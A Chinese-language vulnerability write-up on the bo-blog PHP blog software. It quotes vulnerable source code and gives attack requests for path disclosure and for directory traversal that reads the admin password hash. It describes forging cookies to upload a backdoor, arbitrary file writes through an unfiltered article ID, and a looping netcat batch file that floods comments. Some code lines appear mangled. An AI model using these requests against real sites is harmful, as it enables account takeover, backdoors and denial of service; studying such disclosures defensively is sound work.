bo-blog是一款外觀好看，而且當(dāng)前流行的個(gè)人博客系統(tǒng)，在很多下載站你都可以找到這套程序，而且甚至有很多安全界的人都使用著這套php+txt的程序，但是這套程序里有些安全隱患，可能會(huì)被人利用去做一些破壞。

　　首先開(kāi)門見(jiàn)山，我們說(shuō)說(shuō)它的絕對(duì)路徑暴露問(wèn)題.........

　　只要提交地址：_blank>http://localhost/blog/index.php?m=2&y=/2005

　　就可以得到程序所在絕對(duì)路徑!

　　這是php中很經(jīng)常出現(xiàn)的問(wèn)題!

　　現(xiàn)在我們?cè)趤?lái)看一段代碼，這是showcat.php里的內(nèi)容!

　　if (!file_exists("$dirblog/$cat.php")) {

　　wronginfo($langerrornocat);

　　}

　　unset ($allfiles);

　　$allfiles=@file("$dirblog/$cat.php");

　　看到了沒(méi)有?他直接把cat.php沒(méi)有處理就拿出來(lái)用了，而它又是怎么處理他拿出來(lái)的數(shù)據(jù)的呢?

　　for ($i=$start; $i<$end;$i++) {

　　$latest=explode("|",$allfiles[$i]);

　　$articleid=$latest[1];

　　$articlename=$latest[2];

　　$latest[3]=mktimezone($latest[3]);

　　$showtime=date("Y-n-j",$latest[3]);

　　這樣，它將$cat提交來(lái)的文件打開(kāi)，讀出來(lái)，但是以|為分隔讀出文件內(nèi)容，因?yàn)橐詜讀出文件內(nèi)容卻是從1開(kāi)始的，所以我們讀不出其他的文件，我們只能讀文件里有|的文件的第一個(gè)|后面的數(shù)據(jù)。也就是說(shuō)，假設(shè)我們知道用戶所在目錄的話，我們就可以提交_blank>http://localhost/blog/index.php?job=showcat&cat=../saiy/userid

　　便可以得到管理員的密碼散列。

　　然后偽造cookies登陸，直接可以傳后門了。但是前提是要知道目錄名，所以這只限制于目錄名了，但是假設(shè)對(duì)方站點(diǎn)上有其他的php+文本的程序，我們可以利用此文件讀出隱秘內(nèi)容。

　　我們?cè)賮?lái)說(shuō)第二個(gè)問(wèn)題，回復(fù)評(píng)論未限制時(shí)間，大家大概覺(jué)得這不算什么問(wèn)題吧，看完代碼不知道你還會(huì)這么想嗎?

　　$replyauthor=safe_convert($replyauthor);

　　$remreplyauthor=$replyauthor;

　　if ($replyemail!="") $replyauthor.="胃胃".safe_convert($replyemail);

　　$replycontent=safe_convert($replycontent);

　　$simplecontent=preg_replace("/[(.+?)]/is", "", $replycontent);

　　$simplecontent=preg_replace("/<(.+?)>/is", "", $simplecontent);

　　$simplecontent=preg_replace("/&(.+?);/is", "", $simplecontent);

　　$curexcerpt=msubstr($simplecontent,0,20);

　　$timestamp=time();

　　$areply=@readfromfile("$dirblog/$articleid.rpl");

　　writetofile("$dirblog/$articleid.rpl",$replycontent."n|rep|n".$areply);

　　writetofile("$dirblog/list.php",$all1);

　　updaterenum(1);

　　看到?jīng)]有?居然也沒(méi)對(duì)$articleid做過(guò)濾，大家覺(jué)得嚇人嗎?哦?你們覺(jué)得不怎么樣?恐怕不好玩?我改改你再看看。

　　writetofile("$dirblog/C:winntsystem32hacker.rpl",$replycontent."n|rep|n".$areply);

　　呼，這樣我們把一個(gè)垃圾文件寫到系統(tǒng)目錄下了。要么，寫到管理員啟動(dòng)目錄?一個(gè)N大無(wú)比的文本文件。

　　只要我們不停的提交數(shù)據(jù)，則不斷的把文件寫入了，假設(shè)你手頭沒(méi)有工具可以幫你提交，我教你個(gè)簡(jiǎn)單的，利用NC的方法!

　　首先，抓取你發(fā)表評(píng)論的包，存在NC所在目錄下，命名為test.txt。這個(gè)大家都會(huì)做吧~~

　　再建立一個(gè)bat，命名為test.bat內(nèi)容為：

　　nc www.test.com 80 cls

　　test.bat

　　呵呵，運(yùn)行這個(gè).bat文件它就會(huì)不停的發(fā)送評(píng)論了，開(kāi)兩個(gè)就是兩個(gè)線程哦 ！

（本文由責(zé)任編輯 pasu 整理發(fā)布）

最新評(píng)論